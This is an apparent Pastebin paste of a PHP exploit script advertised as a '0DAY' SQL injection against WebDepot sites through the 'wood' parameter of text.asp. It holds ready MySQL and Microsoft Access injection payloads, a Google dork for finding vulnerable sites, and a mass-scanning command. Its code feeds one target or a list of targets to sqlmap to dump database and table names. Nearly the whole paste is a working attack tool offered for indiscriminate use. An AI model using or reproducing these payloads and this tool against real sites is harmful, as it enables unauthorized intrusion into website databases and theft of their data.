Advertisement
Guest User

Untitled

a guest
Mar 28th, 2015
432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.29 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4.  
  5. # AUTOR: Cleiton Pinheiro / Nick: googleINURL
  6. # Blog: http://blog.inurl.com.br
  7. # Twitter: https://twitter.com/googleinurl
  8. # Fanpage: https://fb.com/InurlBrasil
  9. # Pastebin http://pastebin.com/u/Googleinurl
  10. # GIT: https://github.com/googleinurl
  11. # PSS: http://packetstormsecurity.com/user/googleinurl
  12. # YOUTUBE: http://youtube.com/c/INURLBrasil
  13. # PLUS: http://google.com/+INURLBrasil
  14.  
  15.  
  16. # EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
  17. # VENTOR: http://www.webdepot.co.il
  18. # GET VULN: wood=(id)
  19. # $wood=intval($_REQUEST['wood'])
  20. -----------------------------------------------------------------------------
  21.  
  22. # DBMS: 'MySQL'
  23. # Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  24.  
  25. # DBMS: 'Microsoft Access'
  26. # Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  27. -----------------------------------------------------------------------------
  28.  
  29. # http://target.us/text.asp?wood=(id)+Exploit
  30.  
  31. # GOOGLE DORK: inurl:text.asp?wood=
  32.  
  33. # --help:
  34. -t : SET TARGET.
  35. -f : SET FILE TARGETS.
  36. -p : SET PROXY
  37. Execute:
  38. php WebDepoxpl.php -t target
  39. php WebDepoxpl.php -f targets.txt
  40. php WebDepoxpl.php -t target -p 'http://localhost:9090'
  41. -----------------------------------------------------------------------------
  42.  
  43. # EXPLOIT MASS USE SCANNER INURLBR
  44. # COMMAND: ./inurlbr.php --dork 'inurl:text.asp?wood=' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-vul "php WebDepoxpl.php -t '_TARGET_'"
  45. # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
  46. -----------------------------------------------------------------------------
  47.  
  48. */
  49.  
  50.  
  51. error_reporting(1);
  52. set_time_limit(0);
  53. ini_set('display_errors', 1);
  54. ini_set('max_execution_time', 0);
  55. ini_set('allow_url_fopen', 1);
  56. ob_implicit_flush(true);
  57. ob_end_flush();
  58. $folder_SqlMap = "python ../sqlmap/sqlmap.py";
  59. $op_ = getopt('f:t:p:', array('help::'));
  60. echo "
  61. _____
  62. (_____) ____ _ _ _ _ _____ _ ____ _ _
  63. (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) |
  64. \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| |
  65. \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | |
  66. /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | |
  67. [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_|
  68. \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n
  69. [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n";
  70. $menu = "
  71. -t : SET TARGET.
  72. -f : SET FILE TARGETS.
  73. -p : SET PROXY
  74. Execute:
  75. php WebDepoxpl.php -t target
  76. php WebDepoxpl.php -f targets.txt
  77. php WebDepoxpl.php -t target -p 'http://localhost:9090'
  78. \n";
  79. echo isset($op_['help']) ? exit($menu) : NULL;
  80.  
  81. $params = array(
  82. 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
  83. 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
  84. 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
  85. 'folder' => $folder_SqlMap,
  86. 'line' => "-----------------------------------------------------------------------------------"
  87. );
  88.  
  89. not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
  90. not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
  91. not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
  92.  
  93. function not_isnull_empty($valor = NULL) {
  94. RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  95. }
  96.  
  97. function __plus() {
  98. ob_flush();
  99. flush();
  100. }
  101.  
  102. function __listTarget($file) {
  103. $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
  104. echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n";
  105. foreach ($tgt_ as $url) {
  106. echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n";
  107. __plus();
  108. $file['target'] = $url;
  109. __exec($file) . __plus();
  110. }
  111. }
  112.  
  113. function __exec($params) {
  114. __plus();
  115. echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n";
  116. echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n";
  117. $command = "python {$params['folder']} -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --tables";
  118. system($command, $dados) . empty($dados[0]) ? exit() : NULL;
  119. __plus();
  120. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement